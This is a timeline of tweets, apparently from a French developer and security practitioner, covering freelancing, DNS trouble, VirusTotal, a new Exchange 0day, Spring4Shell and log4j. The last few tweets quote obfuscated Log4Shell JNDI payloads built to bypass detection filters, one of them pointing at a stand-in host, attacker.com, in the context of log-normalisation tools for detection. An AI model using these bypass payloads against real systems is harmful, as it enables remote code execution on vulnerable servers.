Daniel Fages

@ValeryMarchive @najatvb Mine de rien, rechercher les erreurs de frappe dans le code copié depuis Hebdogiciel et comprendre pourquoi ça ne marchait pas m’a appris beaucoup de choses… mais bon, peut-être pas au point d’y retourner volontairement 😅

@najatvb Dans les années 1980, il y avait un truc qui s'appelait #hebdogiciel, avec ses pages de code que plein de passionné(e)s passaient des heures à taper. Leur demander ce qu'ils pensent du papier et du crayon pour coder serait peut-être une bonne idée 🤷‍♂️

Libérons-nous. Je sais que ce sujet est rarement abordé comme cela, mais avons nous vraiment envie de cette emprise d’Internet sur nos vies? Une invitation à y réfléchir. lefigaro.fr/vox/societe/na…

New update for Home Agenda calendar widget. Primarily adds support for Android 12 and newer ⚠️ Also it's on a -50% sale until the end of the year! Like & reshare to help discoverability. play.google.com/store/apps/det…

Hello Twitter ! Est ce que j’ai dans mon réseau un #freelance qui s’y connaît en #graphql ? Merci 🙏

@gbillois Le même sans fruit à coque 😅

Encore un coup du collectif des fruits à coques ! #Fraude #SMS

@DevoxxFR It’s always DNS… 😅

Souci DNS corrigé (mais TTL assez long). Le site cfp.devoxx.fr est accessible à nouveau.

@SecuriTears @AhnLab_SecuInfo The link gives a 404 Blog post removed ?

According to @AhnLab_SecuInfo, there is a new Exchange 0day. Different from GTSC’s CVE-2022-41040, CVE-2022-41082. asec.ahnlab.com/ko/39682/

@joseotoro @virustotal Yes it is, thanks for the quick fix

@madCdan @virustotal It should be fixed now. Sorry for the inconvenience!

Hey @virustotal it seems your API v2 is currently broken and always returned an HTTP 204 error ("You have reached your API quota limits") even if we're not over the quota. API v3 is OK. Could you please confirm ?

Salut mes followers, Je ne pense pas en avoir officiellement parlé ici, mais je suis désormais #freelance et interviens sur une variété de sujets infra/code, le site de ma boite est indalit.com et j'y résume mes technos de prédilection. RT fortement appréciés !

We've published an analysis of the #Spring4Shell RCE to help provide better "facts" about what we know so far. There are 2 vulnerabilities and people are confusing them. Note: This post is Markdown on GitHub if you'd like to add anything (link in thread). lunasec.io/docs/blog/spri…

@iMilnb Tu as ce projet de Saumil Shah : github.com/therealsaumil/…

Eh les lutins de l'embarqué, vous avez déjà fait booter un firmware genre de cam ip avec du qemu arm ?

@edasfr Parce que, par définition, une application évolue au cours du temps et qu’en général les besoins se complexifient ; si, en plus, on veut une UX adaptée à iOS d’une part et Android d’autre part ça complique d’autant plus les choses.

@edasfr Oui, développer un produit coûte (très) cher. Autant je comprends qu’on puisse partir sur ce genre de solutions web/js pour faire un PoC ou tester le marché, autant sur le moyen terme cela me paraît inapproprié (si on a pas les moyens faut arrêter le projet)

@edasfr Peut-être mais quand je vois toutes les dépendances et la taille que font ce genre d’apps, je comprends pourquoi on retrouve maintenant 8Go de RAM dans les smartphones 😜

@edasfr Est-ce que le problème n'est pas là justement ? Est-ce que ce n'est pas se mentir que de croire qu'on va faire une app optimisée et performante pour des plateformes complexes Android/iOS en ne maîtrisant "que" Web/JS ?

@edasfr Le natif, il n’y a que ça de vrai ! 😁

You may have concerns if Log4j security vulnerability impacts our products 😱 We confirm that none of Genymotion products, SaaS or Device Image are impacted by this vulnerability 🦺

@ymzkei5 Yes, option to be used with cautious :-)

deobfuscate tool by madCdan : “it's possible to enable the real JNDI lookup by passing the "-X" parameter to JndiLookup ("-X" to be passed as the first parameter) ; PLEASE BE CAUTIOUS with this because it could lead to your system being compromised.”

@ymzkei5 I wrote a small tool which deobfuscate log4j lookups, based on the actual code of log4j : github.com/madCdan/JndiLo…

There may be many ways to avoid detection :_( jndi: jn${env::-}di: jn${date:}di${date:':'} j${k8s:k5:-ND}i${sd:k5:-:} j${main:\k5:-Nd}i${spring:k5:-:} j${sys:k5:-nD}${lower:i${web:k5:-:}} j${::-nD}i${::-:} j${EnV:K5:-nD}i: j${loWer:Nd}i${uPper::} log4j bypass

@Rezn0k I wrote a small tool to help normalize logs before filtering them to find #log4j jndi exploit attempts : github.com/madCdan/JndiLo…

If you're filtering on "ldap", "jndi", or the ${lower:x} method, I have bad news for you: ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} This gets past every filter I've found so far. There's no shortage of these bypasses. #log4j